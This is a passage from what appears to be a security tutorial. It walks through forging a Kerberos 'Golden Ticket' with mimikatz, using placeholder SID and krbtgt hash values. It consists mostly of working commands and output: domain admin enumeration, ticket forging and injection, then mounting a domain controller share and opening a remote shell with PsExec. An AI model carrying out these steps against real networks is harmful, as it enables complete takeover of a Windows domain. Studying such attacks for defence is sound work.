Username that we'd like to impersonate
As you can see, exploiting this architectural flaw is not trivial, because we need the NTLM hash of the krbtgt user and that requires hacking a Domain Controller first. But once that is done we can play with it for some time, because the hash of the krbtgt user will not change for a while.
As you know mimikatz can dump and replay the existing tickets on Windows, so when we got access to a server or workstation and dumped the tickets we can easily replay those on another computer and get access to the same resource. See Google for more info.
Attack
When we have everything from the list above, we can create a new TGT ticket with mimikatz and grant access to anything in the domain. Let's see an example:
First we look for a domain administrator:
C:\Users\evilhacker>net group "domain admins" /domain
The request will be processed at a domain controller for domain ctu.domain.
Group name Domain Admins
Comment Designated administrators of the domain
Members
-------------------------------------------------------------------------------
Administrator schema.Admin Jack.Bauer
Administrator is good for us, so we create a TGT ticket with the Kerberos user's hashed password and make it look like as if Administrator asked for an access to a share. Now let's get the Domain SID. Easiest way to do that is just use: "whoami /user" and remove the last part of the SID, or if we have PsTools then PsGetsid.exe come in handy:
C:\Users\evilhacker\Documents\mimikatz>PsGetsid.exe CTU.DOMAIN
PsGetSid v1.44 - Translates SIDs to names and vice versa
Copyright (C) 1999-2008 Mark Russinovich
Sysinternals - www.sysinternals.com
SID for CTU.DOMAIN\CTU.DOMAIN:
S-1-1-12-123456789-1234567890-123456789
Now we have everything to start the attack. First we list the existing Kerberos tickets, if there is any we can those with the purge command (but it is not necessary) and then we can create the Golden Ticket and pass that.
C:\Users\evilhacker\Documents\mimikatz>mimikatz.exe
.#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Jan 21 2014 15:06:17)
.## ^ ##.
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
'## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)
'#####' with 14 modules * * */
mimikatz # kerberos::list
[00000000] - 17
Start/End/MaxRenew: 1/24/2014 12:46:49 PM ; 1/24/2014 9:23:28 PM ; 1/31/2014
11:23:28 AM
Server Name : krbtgt/CTU.DOMAIN @ CTU.DOMAIN
Client Name : evilhacker @ CTU.DOMAIN
Flags 60a00000 : pre_authent ; renewable ; forwarded ; forwardable ;
...
mimikatz # kerberos::purge
Ticket(s) purge for current session is OK
mimikatz # kerberos::golden /admin:Administrator /domain:CTU.DOMAIN /sid:S-1-1-12-123456789-1234567890-123456789 /krbtgt:deadbeefboobbabe003133700009999 /ticket:Administrator.kiribi
Admin : Administrator
Domain : CTU.DOMAIN
SID : S-1-1-12-123456789-1234567890-123456789
krbtgt : deadbeefboobbabe003133700009999
Ticket : Administrator.kiribi
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Final Ticket Saved to file !
mimikatz # kerberos::ptt Administrator.kiribi
Ticket 'Administrator.kiribi' successfully submitted for current session
mimikatz # kerberos::list
[00000000] - 17
Start/End/MaxRenew: 1/24/2014 12:52:13 PM ; 1/24/2024 12:52:13 PM ; 1/24/2034
12:52:13 PM
Server Name : krbtgt/CTU.DOMAIN @ CTU.DOMAIN
Client Name : Administrator @ CTU.DOMAIN
Flags 40e00000 : pre_authent ; initial ; renewable ; forwardable ;
mimikatz # kerberos::tgt
Keberos TGT of current session :
Start/End/MaxRenew: 1/24/2014 12:52:13 PM ; 1/24/2024 12:52:13 PM ; 1
/24/2034 12:52:13 PM
Service Name (02) : krbtgt ; CTU.DOMAIN; @ CTU.DOMAIN
Target Name (--) : @ CTU.DOMAIN
Client Name (01) : Administrator ; @ CTU.DOMAIN
Flags 40e00000 : pre_authent ; initial ; renewable ; forwardable ;
Session Key (17) : 5b 1a f2 fb f2 4d 2c 70 9c 3f 36 80 82 0c 23 37
Ticket (00 - 17) : [...]
(NULL session key means allowtgtsessionkey is not set to 1)
Now you can mount any share or use any RPC related tool that you like.
C:\Users\evilhacker\Documents\mimikatz>net use i: \\dc01.ctu.domain\c$
The command completed successfully.
C:\Users\evilhacker\Documents\mimikatz>net use
New connections will be remembered.
Status Local Remote Network
-------------------------------------------------------------------------------
OK I: \\dc01.ctu.domain\c$
Microsoft Windows Network
The command completed successfully.
OR
C:\Users\evilhacker\Documents\pstools>PsExec.exe \\dc01.ctu.domain\ cmd.exe
PsExec v2.0 - Execute processes remotely
Copyright (C) 2001-2013 Mark Russinovich
Sysinternals - www.sysinternals.com
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>hostname
DC01
C:\Windows\system32>exit
cmd.exe exited on dc01.ctu.domain\ with error code 0.
Some additional notes: